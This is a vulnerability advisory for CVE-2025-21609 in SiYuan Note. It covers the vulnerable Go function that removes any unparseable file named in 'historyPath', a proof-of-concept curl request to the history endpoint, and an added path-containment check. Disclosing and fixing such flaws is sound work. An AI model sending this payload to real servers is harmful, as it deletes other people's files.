CVE-2025-21609 github.com/siyuan-note/siyuan/kernel

Package

Manager: go
Name: github.com/siyuan-note/siyuan/kernel
Vulnerable Version: >=0 <0.0.0-20250103014808-d9887aeec1b2

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N/E:U/RL:U/RC:R

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00199 (percentile: 0.42118)

Details

SiYuan has an arbitrary file deletion vulnerability

### Summary

An **arbitrary file deletion vulnerability** has been identified in the latest version of SiYuan Note. The vulnerability exists in the `POST /api/history/getDocHistoryContent` endpoint. An attacker can craft a payload to exploit this vulnerability, resulting in the deletion of arbitrary files on the server.

### Details

The vulnerability can be reproduced by sending a crafted request to the `/api/history/getDocHistoryContent` endpoint, like:

```
curl "http://127.0.0.1:6806/api/history/getDocHistoryContent" -X POST -H "Content-Type: application/json" -d '{"historyPath":"<abs_filepath_of_a_file>"}'
```

Replace `<abs_filepath_of_a_file>` with the absolute file path of the target file you wish to delete.

The `historyPath` parameter in the payload is processed by `func getDocHistoryContent` in `api/history.go:133`. In turn, `historyPath` is passed to `func GetDocHistoryContent` located in `model/history.go:150`, which is the sink of the vulnerability. If `historyPath` exists and its contents cannot be parsed by `filesys.ParseJSONWithoutFix`, the file is deleted by `os.RemoveAll`:

```go
func GetDocHistoryContent(historyPath, keyword string, highlight bool) (id, rootID, content string, isLargeDoc bool, err error) {
	if !gulu.File.IsExist(historyPath) {
		logging.LogWarnf("doc history [%s] not exist", historyPath)
		return
	}

	data, err := filelock.ReadFile(historyPath)
	if err != nil {
		logging.LogErrorf("read file [%s] failed: %s", historyPath, err)
		return
	}
	isLargeDoc = 1024*1024*1 <= len(data)

	luteEngine := NewLute()
	historyTree, err := filesys.ParseJSONWithoutFix(data, luteEngine.ParseOptions)
	if err != nil {
		logging.LogErrorf("parse tree from file [%s] failed, remove it", historyPath)
		// Sink: the caller-supplied path is removed when parsing fails.
		os.RemoveAll(historyPath)
		return
	}
	...
}
```

### PoC

```
curl "http://127.0.0.1:6806/api/history/getDocHistoryContent" -X POST -H "Content-Type: application/json" -d '{"historyPath":"<abs_filepath_of_a_file>"}'
```

### Impact

Arbitrary file deletion vulnerability.
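
A containment check that keeps a caller-supplied `historyPath` inside the history directory before any read or delete, as an added example (not SiYuan's code and not the project's actual fix). `ResolveHistoryPath`, `historyRoot`, `ErrOutsideHistory` and the temporary layout built in `Demo` are assumptions made for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

var ErrOutsideHistory = errors.New("historyPath is outside the history directory")

// ResolveHistoryPath (hypothetical helper, not a SiYuan function) returns the
// canonical form of requested only when it lies strictly inside historyRoot.
func ResolveHistoryPath(historyRoot, requested string) (string, error) {
	root, err := filepath.EvalSymlinks(historyRoot) // canonical root, symlinks resolved
	if err != nil {
		return "", err
	}
	p, err := filepath.EvalSymlinks(requested) // also errors if the file is missing
	if err != nil {
		return "", err
	}
	rel, err := filepath.Rel(root, p)
	if err != nil || rel == "." || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrOutsideHistory
	}
	return p, nil
}

// Demo runs the check against a constructed temp layout (sample data only).
func Demo() (insideOK, outsideRejected, traversalRejected bool, err error) {
	tmp, err := os.MkdirTemp("", "histdemo")
	if err != nil {
		return
	}
	defer os.RemoveAll(tmp)
	root := filepath.Join(tmp, "history")
	inside, outside := filepath.Join(root, "doc.sy"), filepath.Join(tmp, "notes.txt")
	os.MkdirAll(root, 0o755) // a setup failure surfaces as insideOK == false
	os.WriteFile(inside, []byte("{}"), 0o600)
	os.WriteFile(outside, []byte("keep"), 0o600)
	_, e1 := ResolveHistoryPath(root, inside)
	_, e2 := ResolveHistoryPath(root, outside)
	_, e3 := ResolveHistoryPath(root, filepath.Join(root, "..", "notes.txt")) // traversal form
	return e1 == nil, errors.Is(e2, ErrOutsideHistory), errors.Is(e3, ErrOutsideHistory), nil
}

func main() { fmt.Println(Demo()) }
```

A handler would call the check first and use only the returned path; returning the parse error instead of removing the file also takes away the destructive side effect.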

Metadata

Created: 2025-01-03T16:24:34Z
Modified: 2025-01-03T19:26:05Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-8fx8-pffw-w498/GHSA-8fx8-pffw-w498.json
CWE IDs: ["CWE-459", "CWE-552"]
Alternative ID: GHSA-8fx8-pffw-w498
Finding: F082
Auto approve: 1